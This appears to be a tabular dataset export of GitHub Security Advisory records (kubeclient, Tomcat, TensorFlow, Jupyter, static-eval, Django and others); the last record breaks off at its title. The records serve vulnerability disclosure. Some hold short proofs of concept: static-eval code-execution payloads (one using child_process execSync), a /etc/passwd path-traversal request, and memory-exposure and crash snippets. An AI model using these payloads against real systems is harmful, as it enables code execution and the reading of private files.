ecosystem
stringclasses
14 values
vuln_id
stringlengths
10
19
summary
stringlengths
4
267
details
stringlengths
9
13.5k
aliases
stringlengths
17
144
modified_date
stringdate
2010-05-27 05:47:00
2022-05-10 08:46:52
published_date
stringdate
2005-12-31 05:00:00
2022-05-10 08:46:50
severity
stringclasses
5 values
score
float64
0
10
cwe_id
stringclasses
988 values
refs
stringlengths
30
17.7k
introduced
stringlengths
75
4.26k
GHSA
GHSA-69p3-xp37-f692
Improper Certificate Validation in kubeclient
A flaw was found in all versions of kubeclient up to (but not including) v4.9.3, the Ruby client for Kubernetes REST API, in the way it parsed kubeconfig files. When the kubeconfig file does not configure custom CA to verify certs, kubeclient ends up accepting any certificate (it wrongly returns VERIFY_NONE). Ruby applications that leverage kubeclient to parse kubeconfig files are susceptible to Man-in-the-middle attacks (MITM).
{'CVE-2022-0759'}
2022-04-08T21:45:07Z
2022-03-26T00:00:29Z
HIGH
8.1
{'CWE-295'}
{'https://github.com/advisories/GHSA-69p3-xp37-f692', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0759', 'https://github.com/ManageIQ/kubeclient/issues/555', 'https://github.com/ManageIQ/kubeclient/issues/554', 'https://github.com/ManageIQ/kubeclient/pull/556'}
null
GHSA
GHSA-h3mf-4fwp-59c7
VecStorage Deserialize Allows Violation of Length Invariant
The `Deserialize` implementation for `VecStorage` did not maintain the invariant that the number of elements must equal `nrows * ncols`. Deserialization of specially crafted inputs could allow memory access beyond allocation of the vector. This flaw was introduced in v0.11.0 ([`086e6e`](https://github.com/dimforge/nalgebra/commit/086e6e719f53fecba6dadad2e953a487976387f5)) due to the addition of an automatically derived implementation of `Deserialize` for `MatrixVec`. `MatrixVec` was later renamed to `VecStorage` in v0.16.13 ([`0f66403`](https://github.com/dimforge/nalgebra/commit/0f66403cbbe9eeac15cedd8a906c0d6a3d8841f2)) and continued to use the automatically derived implementation of `Deserialize`. This flaw was corrected in commit [`5bff536`](https://github.com/dimforge/nalgebra/commit/5bff5368bf38ddfa31416e4ae9897b163031a513) by returning an error during deserialization if the number of elements does not exactly match the expected size.
null
2021-08-18T23:03:07Z
2021-08-05T19:58:06Z
MODERATE
0
null
{'https://rustsec.org/advisories/RUSTSEC-2021-0070.html', 'https://github.com/dimforge/nalgebra/issues/883', 'https://github.com/advisories/GHSA-h3mf-4fwp-59c7', 'https://github.com/dimforge/nalgebra/pull/889', 'https://github.com/dimforge/nalgebra/blob/dev/CHANGELOG.md#0270', 'https://github.com/dimforge/nalgebra/commit/a803271fcce75b7c151e92aa099dfa546db4adc5'}
null
GHSA
GHSA-x6hx-7gh3-3q98
Prototype Pollution in mootools
This affects all versions of package mootools. This is due to the ability to pass untrusted input to Object.merge()
{'CVE-2021-23432'}
2021-09-02T17:09:30Z
2021-09-02T17:09:30Z
MODERATE
5.4
{'CWE-1321'}
{'https://github.com/advisories/GHSA-x6hx-7gh3-3q98', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23432', 'https://snyk.io/vuln/SNYK-JS-MOOTOOLS-1325536'}
null
GHSA
GHSA-pjfr-qf3p-3q25
When running Apache Tomcat on Windows with HTTP PUTs enabled it was possible to upload a JSP file to the server
When running Apache Tomcat 7.0.0 to 7.0.79 on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.
{'CVE-2017-12615'}
2022-04-27T13:37:16Z
2018-10-17T16:30:31Z
HIGH
8.1
{'CWE-434'}
{'https://access.redhat.com/errata/RHSA-2018:0466', 'https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424@%3Cdev.tomcat.apache.org%3E', 'https://github.com/advisories/GHSA-pjfr-qf3p-3q25', 'https://www.exploit-db.com/exploits/42953/', 'https://access.redhat.com/errata/RHSA-2017:3114', 'https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2017:3113', 'https://access.redhat.com/errata/RHSA-2017:3081', 'https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c@%3Cannounce.apache.org%3E', 'http://www.securitytracker.com/id/1039392', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12615', 'https://www.synology.com/support/security/Synology_SA_17_54_Tomcat', 'https://access.redhat.com/errata/RHSA-2018:0465', 'http://breaktoprotect.blogspot.com/2017/09/the-case-of-cve-2017-12615-tomcat-7-put.html', 'https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20171018-0001/', 'https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708@%3Cdev.tomcat.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2017:3080', 'https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3Cannounce.tomcat.apache.org%3E', 'https://github.com/breaktoprotect/CVE-2017-12615', 'http://www.securityfocus.com/bid/100901'}
null
GHSA
GHSA-grfj-wjv9-4f9v
Open redirect in Jupyter Server
### Impact _What kind of vulnerability is it? Who is impacted?_ Open redirect vulnerability - a maliciously crafted link to a jupyter server could redirect the browser to a different website. All jupyter servers are technically affected, however, these maliciously crafted links can only be reasonably made for known jupyter server hosts. A link to your jupyter server may *appear* safe, but ultimately redirect to a spoofed server on the public internet. This originated in jupyter/notebook: https://github.com/jupyter/notebook/security/advisories/GHSA-c7vm-f5p4-8fqh ### Patches _Has the problem been patched? What versions should users upgrade to?_ jupyter_server 1.0.6 ### References [OWASP page on open redirects](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html) ### For more information If you have any questions or comments about this advisory, or vulnerabilities to report, please email our security list [security@ipython.org](mailto:security@ipython.org). Credit: zhuonan li of Alibaba Application Security Team
{'CVE-2020-26232'}
2021-01-07T22:40:25Z
2020-11-24T21:20:52Z
MODERATE
4.1
{'CWE-601'}
{'https://github.com/jupyter/jupyter_server/security/advisories/GHSA-grfj-wjv9-4f9v', 'https://nvd.nist.gov/vuln/detail/CVE-2020-26232', 'https://github.com/jupyter-server/jupyter_server/blob/master/CHANGELOG.md#106---2020-11-18', 'https://github.com/jupyter-server/jupyter_server/commit/3d83e49090289c431da253e2bdb8dc479cbcb157', 'https://github.com/advisories/GHSA-grfj-wjv9-4f9v'}
null
GHSA
GHSA-w74j-v8xh-3w5h
Reference binding to nullptr in unicode encoding
### Impact An attacker can cause undefined behavior via binding a reference to null pointer in `tf.raw_ops.UnicodeEncode`: ```python import tensorflow as tf from tensorflow.python.ops import gen_string_ops gen_string_ops.unicode_encode( input_values=[], input_splits=[], output_encoding='UTF-8', errors='ignore', replacement_char='a') ``` The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/unicode_ops.cc#L533-L539) reads the first dimension of the `input_splits` tensor before validating that this tensor is not empty: ```cc const Tensor& input_splits = context->input(1); const auto input_splits_flat = input_splits.flat<SPLITS_TYPE>(); TensorShape output_shape({input_splits.dim_size(0) - 1}); ``` ### Patches We have patched the issue in GitHub commit [2e0ee46f1a47675152d3d865797a18358881d7a6](https://github.com/tensorflow/tensorflow/commit/2e0ee46f1a47675152d3d865797a18358881d7a6). The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by members of the Aivul Team from Qihoo 360.
{'CVE-2021-37667'}
2021-08-25T14:42:09Z
2021-08-25T14:42:09Z
HIGH
7.8
{'CWE-824'}
{'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-w74j-v8xh-3w5h', 'https://github.com/advisories/GHSA-w74j-v8xh-3w5h', 'https://github.com/tensorflow/tensorflow/commit/2e0ee46f1a47675152d3d865797a18358881d7a6', 'https://nvd.nist.gov/vuln/detail/CVE-2021-37667'}
null
GHSA
GHSA-52r9-g5g6-2hjp
Path Traversal in node-srv
Versions of `node-srv` before 2.1.1 are vulnerable to path traversal allowing a remote attacker to read files from the server that uses `node-srv`. ## Recommendation Update to version 2.1.1 or later.
{'CVE-2018-3714'}
2021-01-08T19:51:51Z
2018-07-26T14:50:41Z
HIGH
0
{'CWE-22'}
{'https://www.npmjs.com/advisories/588', 'https://hackerone.com/reports/309124', 'https://nvd.nist.gov/vuln/detail/CVE-2018-3714', 'https://github.com/advisories/GHSA-52r9-g5g6-2hjp'}
null
GHSA
GHSA-v42f-j8fx-99f3
Queue<T> should have a Send bound on its Send/Sync traits
Affected versions of this crate unconditionally implements `Send`/`Sync` for `Queue<T>`. This allows (1) creating data races to a `T: !Sync` and (2) sending `T: !Send` to other threads, resulting in memory corruption or other undefined behavior.
null
2021-08-25T21:00:13Z
2021-08-25T21:00:13Z
MODERATE
0
{'CWE-362'}
{'https://github.com/advisories/GHSA-v42f-j8fx-99f3', 'https://github.com/rossdylan/rust-scottqueue/issues/1', 'https://rustsec.org/advisories/RUSTSEC-2020-0133.html'}
null
GHSA
GHSA-r2x6-vrxx-jgv4
Data races in multiqueue
An issue was discovered in the multiqueue crate through 2020-12-25 for Rust. There are unconditional implementations of Send for InnerSend<RW, T>, InnerRecv<RW, T>, FutInnerSend<RW, T>, and FutInnerRecv<RW, T>.
{'CVE-2020-36463'}
2021-08-25T20:58:07Z
2021-08-25T20:58:07Z
HIGH
8.1
{'CWE-362', 'CWE-77'}
{'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/multiqueue/RUSTSEC-2020-0143.md', 'https://github.com/schets/multiqueue/issues/31', 'https://github.com/advisories/GHSA-r2x6-vrxx-jgv4', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36463', 'https://rustsec.org/advisories/RUSTSEC-2020-0143.html'}
null
GHSA
GHSA-x9hc-rw35-f44h
Sandbox Breakout / Arbitrary Code Execution in static-eval
Versions of `static-eval`prior to 2.0.2 pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package. ## Proof of concept ``` var evaluate = require('static-eval'); var parse = require('esprima').parse; var src = process.argv[2]; var payload = '(function({x}){return x.constructor})({x:"".sub})("console.log(process.env)")()' var ast = parse(payload).body[0].expression; console.log(evaluate(ast, {x:1})); ``` ## Recommendation Upgrade to version 2.0.2 or later.
null
2021-09-27T13:40:53Z
2020-09-02T15:46:03Z
HIGH
7.3
{'CWE-94'}
{'https://github.com/advisories/GHSA-x9hc-rw35-f44h', 'https://www.npmjs.com/advisories/758'}
null
GHSA
GHSA-q2c6-c6pm-g3gh
Arbitrary Code Execution in handlebars
Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). ## Recommendation Upgrade to version 3.0.8, 4.5.3 or later.
null
2020-09-04T15:07:38Z
2020-09-04T15:07:38Z
HIGH
0
null
{'https://github.com/advisories/GHSA-q2c6-c6pm-g3gh', 'https://www.npmjs.com/advisories/1324'}
null
GHSA
GHSA-cfcv-q4qq-2ph4
CKEditor 4 vulnerabilities in versions <4.16.1
Details see: https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-m94c-37g6-cjhc ( CVE-2021-37695 ) https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-6226-h7ff-ch6c ( CVE-2021-32808 ) https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-7889-rm5j-hpgg ( CVE-2021-32809 ) Patch: https://github.com/pimcore/pimcore/pull/10032
null
2021-10-08T21:19:54Z
2021-08-23T19:42:05Z
MODERATE
0
null
{'https://github.com/pimcore/pimcore/commit/0d2ce3b1db4ac40646cee5104115767505760b6a', 'https://github.com/pimcore/pimcore/security/advisories/GHSA-cfcv-q4qq-2ph4', 'https://github.com/advisories/GHSA-cfcv-q4qq-2ph4'}
null
GHSA
GHSA-5vjc-qx43-r747
Stored Cross-site Scripting in folder-auth plugin
Folder-based Authorization Strategy Plugin 1.3 and earlier does not escape the names of roles shown on the configuration form. This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Overall/Administer permission. Folder-based Authorization Strategy Plugin 1.4 escapes the names of roles shown on the configuration form. See https://www.jenkins.io/security/advisory/2022-03-15/#SECURITY-2646
null
2022-03-22T12:51:59Z
2022-03-18T23:57:52Z
MODERATE
0
{'CWE-79'}
{'https://github.com/advisories/GHSA-5vjc-qx43-r747', 'https://github.com/jenkinsci/folder-auth-plugin/security/advisories/GHSA-5vjc-qx43-r747', 'https://www.jenkins.io/security/advisory/2022-03-15/#SECURITY-2646'}
null
GHSA
GHSA-xc7v-wxcw-j472
Memory Exposure in tunnel-agent
Versions of `tunnel-agent` before 0.6.0 are vulnerable to memory exposure. This is exploitable if user supplied input is provided to the auth value and is a number. Proof-of-concept: ```js require('request')({ method: 'GET', uri: 'http://www.example.com', tunnel: true, proxy:{ protocol: 'http:', host:'127.0.0.1', port:8080, auth:USERSUPPLIEDINPUT // number } }); ``` ## Recommendation Update to version 0.6.0 or later.
null
2021-08-04T20:28:52Z
2019-06-03T17:08:26Z
MODERATE
0
{'CWE-200'}
{'https://www.npmjs.com/advisories/598', 'https://github.com/advisories/GHSA-xc7v-wxcw-j472', 'https://gist.github.com/ChALkeR/fd6b2c445834244e7d440a043f9d2ff4', 'https://github.com/request/tunnel-agent/commit/9ca95ec7219daface8a6fc2674000653de0922c0'}
null
GHSA
GHSA-wxj3-qwv4-cvfm
Privilege Escalation in Docker
Docker 1.0.0 uses world-readable and world-writable permissions on the management socket, which allows local users to gain privileges via unspecified vectors.
{'CVE-2014-3499'}
2022-02-15T00:40:44Z
2022-02-15T00:40:44Z
HIGH
8.4
{'CWE-269'}
{'https://github.com/docker/docker/commit/707ef9618b3b26a0534a0af732a22f159eccfaa5', 'https://bugzilla.redhat.com/show_bug.cgi?id=1111687', 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3499', 'https://nvd.nist.gov/vuln/detail/CVE-2014-3499', 'https://rhn.redhat.com/errata/RHSA-2014-0820.html', 'https://github.com/advisories/GHSA-wxj3-qwv4-cvfm'}
null
GHSA
GHSA-rfhr-62xp-2fp2
Open Redirect in trailing-slash
The package trailing-slash before 2.0.1 are vulnerable to Open Redirect via the use of trailing double slashes in the URL when accessing the vulnerable endpoint (such as https://example.com//attacker.example/). The vulnerable code is in index.js::createTrailing(), as the web server uses relative URLs instead of absolute URLs.
{'CVE-2021-23387'}
2021-06-08T23:19:21Z
2021-06-08T23:19:21Z
MODERATE
5.4
{'CWE-601'}
{'https://snyk.io/vuln/SNYK-JS-TRAILINGSLASH-1085707', 'https://github.com/fardog/trailing-slash/commit/f8e66f1429308247e5a119d430203077d8f05048', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23387', 'https://github.com/advisories/GHSA-rfhr-62xp-2fp2', 'https://github.com/fardog/trailing-slash/blob/f640ece055fe85275c983de5eb94661b95e35670/index.js%23L36'}
null
GHSA
GHSA-f7jg-mcvw-9gwv
Directory Traversal in reecerver
Affected versions of `reecerver` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system. Example request: ``` GET /../../../../../../../../../../etc/passwd HTTP/1.1 host:foo ``` ## Recommendation No patch is available for this vulnerability. It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
{'CVE-2017-16188'}
2021-01-08T18:54:05Z
2018-07-23T20:40:40Z
HIGH
0
{'CWE-22'}
{'https://nvd.nist.gov/vuln/detail/CVE-2017-16188', 'https://github.com/advisories/GHSA-f7jg-mcvw-9gwv', 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/reecerver', 'https://www.npmjs.com/advisories/443', 'https://nodesecurity.io/advisories/443'}
null
GHSA
GHSA-x5jp-9fmm-m9pf
showdoc is vulnerable to Cross-Site Request Forgery (CSRF)
showdoc is vulnerable to Cross-Site Request Forgery (CSRF).
{'CVE-2021-3683'}
2021-11-17T21:11:17Z
2021-11-15T23:13:52Z
MODERATE
5.4
{'CWE-352'}
{'https://github.com/advisories/GHSA-x5jp-9fmm-m9pf', 'https://huntr.dev/bounties/063a339a-5d78-40d6-a96a-6716960e8134', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3683', 'https://github.com/star7th/showdoc/commit/67093c879a6563aa6ee08003177777d1975e2351'}
null
GHSA
GHSA-9959-6p3m-wxpc
Denial of service in Netty
The SslHandler in Netty before 3.9.2 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted SSLv2Hello message.
{'CVE-2014-3488'}
2021-09-22T18:44:48Z
2020-06-30T21:01:31Z
MODERATE
0
{'CWE-119'}
{'https://github.com/advisories/GHSA-9959-6p3m-wxpc', 'https://github.com/netty/netty/issues/2562', 'https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html', 'https://github.com/netty/netty/commit/2fa9400a59d0563a66908aba55c41e7285a04994', 'https://snyk.io/vuln/SNYK-JAVA-ORGJBOSSNETTY-31630', 'http://netty.io/news/2014/06/11/3-9-2-Final.html', 'http://secunia.com/advisories/59196', 'https://nvd.nist.gov/vuln/detail/CVE-2014-3488'}
null
GHSA
GHSA-mm7h-323r-9p4g
Downloads Resources over HTTP in imageoptim
imageoptim is a Node.js wrapper for some images compression algorithms. imageoptim downloads zipped resources over HTTP, which leaves it vulnerable to MITM attacks. It may be possible to cause remote code execution (RCE) by swapping out the requested tarball with an attacker controlled tarball if the attacker is on the network or positioned in between the user and the remote server. ## Recommendation No fix is currently available for this vulnerability. It is our recommendation to not install or use this module at this time.
{'CVE-2016-10596'}
2021-01-08T18:27:12Z
2019-02-18T23:50:33Z
HIGH
0
{'CWE-311'}
{'https://www.npmjs.com/advisories/194', 'https://nodesecurity.io/advisories/194', 'https://github.com/advisories/GHSA-mm7h-323r-9p4g', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10596'}
null
GHSA
GHSA-4qwq-q4pr-rr7r
Vulnerability in packageCmd function leads to arbitrary code execution via filePath parameters
aaptjs is a node wraper for aapt. An issue was discovered in the packageCmd function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.
{'CVE-2020-36378'}
2022-05-05T13:47:57Z
2021-11-02T15:42:38Z
CRITICAL
9.8
{'CWE-77', 'CWE-78'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-36378', 'https://github.com/shenzhim/aaptjs/issues/2', 'https://github.com/advisories/GHSA-4qwq-q4pr-rr7r'}
null
GHSA
GHSA-4wjq-69rc-8wcp
Path Traversal in Apache Camel
Apache Camel's File is vulnerable to directory traversal. Camel 2.21.0 to 2.21.3, 2.22.0 to 2.22.2, 2.23.0 and the unsupported Camel 2.x (2.19 and earlier) versions may be also affected.
{'CVE-2019-0194'}
2021-08-03T21:29:50Z
2019-05-02T15:21:34Z
HIGH
7.5
{'CWE-22'}
{'https://github.com/advisories/GHSA-4wjq-69rc-8wcp', 'http://www.openwall.com/lists/oss-security/2019/04/30/2', 'https://lists.apache.org/thread.html/0a163d02169d3d361150e8183df4af33f1a3d8a419b2937ac8e6c66f@%3Cusers.camel.apache.org%3E', 'https://lists.apache.org/thread.html/45e23ade8d3cb754615f95975e89e8dc73c59eeac914f07d53acbac6@%3Ccommits.camel.apache.org%3E', 'https://lists.apache.org/thread.html/b4014ea7c5830ca1fc28edd5cafedfe93ad4af2d9e69c961c5def31d@%3Ccommits.camel.apache.org%3E', 'https://lists.apache.org/thread.html/a39441db574ee996f829344491b3211b53c9ed926f00ae5d88943b76@%3Cdev.camel.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2019-0194'}
null
GHSA
GHSA-8c5j-9r9f-c6w8
Information disclosure in Django
An issue was discovered in Django 2.2 before 2.2.26, 3.2 before 3.2.11, and 4.0 before 4.0.1. Due to leveraging the Django Template Language's variable resolution logic, the dictsort template filter was potentially vulnerable to information disclosure, or an unintended method call, if passed a suitably crafted key.
{'CVE-2021-45116'}
2022-02-14T22:16:34Z
2022-01-12T19:21:10Z
HIGH
7.5
{'CWE-668'}
{'https://www.djangoproject.com/weblog/2022/jan/04/security-releases/', 'https://security.netapp.com/advisory/ntap-20220121-0005/', 'https://docs.djangoproject.com/en/4.0/releases/security/', 'https://github.com/advisories/GHSA-8c5j-9r9f-c6w8', 'https://nvd.nist.gov/vuln/detail/CVE-2021-45116', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B4SQG2EAF4WCI2SLRL6XRDJ3RPK3ZRDV/', 'https://groups.google.com/forum/#!forum/django-announce'}
null
GHSA
GHSA-qcc4-3rxf-gf4m
Unauthorized property update in CheckboxGroup component in Vaadin 12-14 and 15-20
Improper check in `CheckboxGroup` in `com.vaadin:vaadin-checkbox-flow` versions 1.2.0 prior to 2.0.0 (Vaadin 12.0.0 prior to 14.0.0), 2.0.0 prior to 3.0.0 (Vaadin 14.0.0 prior to 14.5.0), 3.0.0 through 4.0.1 (Vaadin 15.0.0 through 17.0.11), 14.5.0 through 14.6.7 (Vaadin 14.5.0 through 14.6.7), and 18.0.0 through 20.0.5 (Vaadin 18.0.0 through 20.0.5) allows attackers to modify the value of a disabled `Checkbox` inside enabled `CheckboxGroup` component via unspecified vectors. - https://vaadin.com/security/cve-2021-33605
{'CVE-2021-33605'}
2021-09-03T20:35:32Z
2021-08-30T16:16:38Z
MODERATE
4.3
{'CWE-754'}
{'https://github.com/vaadin/flow-components/pull/1903', 'https://github.com/vaadin/flow-components/security/advisories/GHSA-qcc4-3rxf-gf4m', 'https://github.com/advisories/GHSA-qcc4-3rxf-gf4m', 'https://vaadin.com/security/cve-2021-33605', 'https://nvd.nist.gov/vuln/detail/CVE-2021-33605'}
null
GHSA
GHSA-jg8v-48h5-wgxg
Prototype Pollution
This affects the package jszip before 3.7.0. Crafting a new zip file with filenames set to Object prototype values (e.g __proto__, toString, etc) results in a returned object with a modified prototype instance.
{'CVE-2021-23413'}
2021-08-31T20:58:02Z
2021-08-10T16:02:18Z
MODERATE
5.3
{'CWE-1321'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-23413', 'https://github.com/advisories/GHSA-jg8v-48h5-wgxg', 'https://github.com/Stuk/jszip/blob/master/lib/object.js%23L88', 'https://github.com/Stuk/jszip/commit/22357494f424178cb416cdb7d93b26dd4f824b36', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1251498', 'https://github.com/Stuk/jszip/pull/766', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1251499', 'https://snyk.io/vuln/SNYK-JS-JSZIP-1251497'}
null
GHSA
GHSA-8v27-2fg9-7h62
Withdrawn: Arbitrary Code Execution in static-eval
All versions of package static-eval are vulnerable to Arbitrary Code Execution using FunctionExpressions and TemplateLiterals. PoC: var evaluate = require('static-eval'); var parse = require('esprima').parse; var src="(function (x) { return ${eval("console.log(global.process.mainModule.constructor._load('child_process').execSync('ls').toString())")} })()" var ast = parse(src).body[0].expression; evaluate(ast) # WITHDRAWN This was deemed not a vulnerability. See [this issue](https://github.com/browserify/static-eval/issues/34) for details.
{'CVE-2021-23334'}
2021-05-06T16:13:08Z
2021-05-06T16:11:25Z
CRITICAL
9.8
{'CWE-94'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-23334', 'https://github.com/advisories/GHSA-8v27-2fg9-7h62', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1071860', 'https://snyk.io/vuln/SNYK-JS-STATICEVAL-1056765', 'https://github.com/browserify/static-eval/blob/master/index.js%23L180'}
null
GHSA
GHSA-ghjx-3jg5-h6r2
High severity vulnerability that affects mercurial
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and consequently execute arbitrary code, by using --debugger as a repository name.
{'CVE-2017-9462'}
2021-09-10T21:36:45Z
2018-07-13T15:17:10Z
HIGH
8.8
{'CWE-732'}
{'https://access.redhat.com/errata/RHSA-2017:1576', 'https://www.mercurial-scm.org/repo/hg/rev/77eaf9539499', 'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29', 'https://github.com/advisories/GHSA-ghjx-3jg5-h6r2', 'https://security.gentoo.org/glsa/201709-18', 'http://www.securityfocus.com/bid/99123', 'https://lists.debian.org/debian-lts-announce/2018/07/msg00005.html', 'http://www.debian.org/security/2017/dsa-3963', 'https://nvd.nist.gov/vuln/detail/CVE-2017-9462', 'https://bugs.debian.org/861243'}
null
GHSA
GHSA-62ww-4p3p-7fhj
API information disclosure flaw in Elasticsearch
Elasticsearch versions before 7.11.2 and 6.8.15 contain a document disclosure flaw was found in the Elasticsearch suggester and profile API when Document and Field Level Security are enabled. The suggester and profile API are normally disabled for an index when document level security is enabled on the index. Certain queries are able to enable the profiler and suggester which could lead to disclosing the existence of documents and fields the attacker should not be able to view.
{'CVE-2021-22135'}
2021-07-02T18:33:02Z
2021-07-02T18:33:02Z
MODERATE
5.3
{'CWE-200'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-22135', 'https://security.netapp.com/advisory/ntap-20210625-0003/', 'https://discuss.elastic.co/t/elastic-stack-7-12-0-and-6-8-15-security-update/268125', 'https://github.com/advisories/GHSA-62ww-4p3p-7fhj'}
null
GHSA
GHSA-955p-rc5h-hg6h
Double free in arenavec
An issue was discovered in the arenavec crate through 2021-01-12 for Rust. A double drop can sometimes occur upon a panic in T::drop().
{'CVE-2021-29931'}
2021-08-25T20:55:04Z
2021-08-25T20:55:04Z
HIGH
7.5
{'CWE-415'}
{'https://github.com/ibabushkin/arenavec/issues/1', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29931', 'https://github.com/advisories/GHSA-955p-rc5h-hg6h', 'https://rustsec.org/advisories/RUSTSEC-2021-0040.html'}
null
GHSA
GHSA-r5xw-q988-826m
Remote Memory Exposure in mongoose
Versions of `mongoose` before 4.3.6, 3.8.39 are vulnerable to remote memory exposure. Trying to save a number to a field of type Buffer on the affected mongoose versions allocates a chunk of uninitialized memory and stores it in the database. ## Recommendation Update to version 4.3.6, 3.8.39 or later.
null
2021-09-23T21:51:52Z
2020-09-01T19:39:37Z
MODERATE
5.1
{'CWE-201'}
{'https://www.npmjs.com/advisories/599', 'https://gist.github.com/ChALkeR/440bc3dfcbd9b6da75c3', 'https://github.com/advisories/GHSA-r5xw-q988-826m', 'https://github.com/Automattic/mongoose/issues/3764', 'https://gist.github.com/ChALkeR/d4a8055625221b6e65f0'}
null
GHSA
GHSA-xj3h-vc9j-j823
Directory Traversal in nodeaaaaa
Affected versions of `nodeaaaaa` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system. Example request: ``` GET /../../../../../../../../../../etc/passwd HTTP/1.1 host:foo ``` ## Recommendation No patch is available for this vulnerability. It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
{'CVE-2017-16223'}
2021-01-08T00:00:54Z
2018-07-23T20:39:32Z
HIGH
0
{'CWE-22'}
{'https://nodesecurity.io/advisories/446', 'https://www.npmjs.com/advisories/446', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16223', 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/nodeaaaaa', 'https://github.com/advisories/GHSA-xj3h-vc9j-j823'}
null
GHSA
GHSA-x7p5-p2c9-phvg
Unexpected database bindings
This is a follow-up to the previous security advisory (GHSA-3p32-j457-pg5x) which addresses a few additional edge cases. If a request is crafted where a field that is normally a non-array value is an array, and that input is not validated or cast to its expected type before being passed to the query builder, an unexpected number of query bindings can be added to the query. In some situations, this will simply lead to no results being returned by the query builder; however, it is possible certain queries could be affected in a way that causes the query to return unexpected results.
null
2021-02-02T15:47:08Z
2021-02-02T15:47:08Z
HIGH
7.2
{'CWE-74'}
{'https://github.com/advisories/GHSA-x7p5-p2c9-phvg', 'https://github.com/laravel/framework/security/advisories/GHSA-x7p5-p2c9-phvg', 'https://github.com/advisories/GHSA-3p32-j457-pg5x', 'https://packagist.org/packages/illuminate/database', 'https://packagist.org/packages/laravel/framework'}
null
GHSA
GHSA-52qp-jpq7-6c54
Insecure Deserialization of untrusted data in rmccue/requests
